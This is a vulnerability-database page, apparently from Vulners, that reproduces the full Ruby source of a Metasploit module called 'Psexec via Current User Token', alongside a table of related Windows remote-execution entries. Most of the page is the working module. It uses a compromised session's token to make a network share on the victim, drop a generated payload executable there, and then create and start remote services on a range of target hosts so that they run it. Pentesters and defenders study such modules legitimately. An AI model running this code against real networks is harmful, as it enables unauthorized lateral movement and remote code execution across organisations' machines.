Vulners
Lucene search
Psexec Via Current User Token
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | Microsoft Windows Authenticated Powershell Command Execution | 13 Jul 201300:00 | – | zdt |
| Windows Management Instrumentation (WMI) Remote Command Execution | 23 Oct 201300:00 | – | zdt |
 | CVE-1999-0504 | 2 Dec 201000:00 | – | circl |
 | CVE-1999-0504 | 4 Feb 200005:00 | – | cve |
 | CVE-1999-0504 | 4 Feb 200005:00 | – | cvelist |
 | Microsoft Windows - (Authenticated) User Code Execution (Metasploit) | 2 Dec 201000:00 | – | exploitdb |
 | Microsoft Windows Authenticated Logged In Users Enumeration | 4 Dec 201223:32 | – | metasploit |
| PsExec via Current User Token | 7 Mar 201323:53 | – | metasploit |
| Powershell Remoting Remote Command Execution | 4 Dec 201422:06 | – | metasploit |
| Windows Management Instrumentation (WMI) Remote Command Execution | 20 Sep 201317:36 | – | metasploit |
10
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/services'
class Metasploit3 < Msf::Exploit::Local
include Post::Windows::WindowsServices
include Exploit::EXE
include Post::File
include Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Psexec via Current User Token',
'Description' => %q{
This module uploads an executable file to the victim system, creates
a share containing that executable, creates a remote service on each
target system using a UNC path to that file, and finally starts the
service(s).
The result is similar to psexec but with the added benefit of using
the session's current authentication token instead of having to know
a password or hash.
},
'License' => MSF_LICENSE,
'Author' => [
'egypt',
'jabra' # Brainstorming and help with original technique
],
'References' => [
# same as for windows/smb/psexec
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Universal', {} ] ],
'DefaultTarget' => 0
))
register_options([
OptString.new("INTERNAL_ADDRESS", [
false,
"Session's internal address or hostname for the victims to grab the "+
"payload from (Default: detected)"
]),
OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
])
end
def exploit
name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
# XXX Find the domain controller
#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
print_status "Using #{share_host} as the internal address for victims to get the payload from"
# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
share_dir = "#{drive}\\#{share_name}"
# Create them
print_status("Creating share #{share_dir}")
session.fs.dir.mkdir(share_dir)
cmd_exec("net share #{share_name}=#{share_dir}")
# Generate an executable from the shellcode and drop it in the share
# directory
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)
print_status("Dropping payload #{filename}")
write_file("#{share_dir}\\#{filename}", payload_exe)
service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
begin
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
begin
print_status("#{server.ljust(16)} Creating service #{name}")
# 3 is Manual startup. Should probably have constants for this junk
service_create(name, display_name, service_executable, 3, server)
# If everything went well, this will create a session. If not, it
# might be permissions issues or possibly we failed to create the
# service.
print_status("#{server.ljust(16)} Starting the service")
service_start(name, server)
print_status("#{server.ljust(16)} Deleting the service")
service_delete(name, server)
rescue
print_error("Exception running payload: #{$!.class} : #{$!}")
print_error("#{server.ljust(16)} WARNING: May have failed to clean up!")
print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
next
end
end
ensure
print_status("Deleting share #{share_name}")
cmd_exec("net share #{share_name} /delete /y")
print_status("Deleting files #{share_dir}")
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
end
end
end
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Aug 2012 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.39474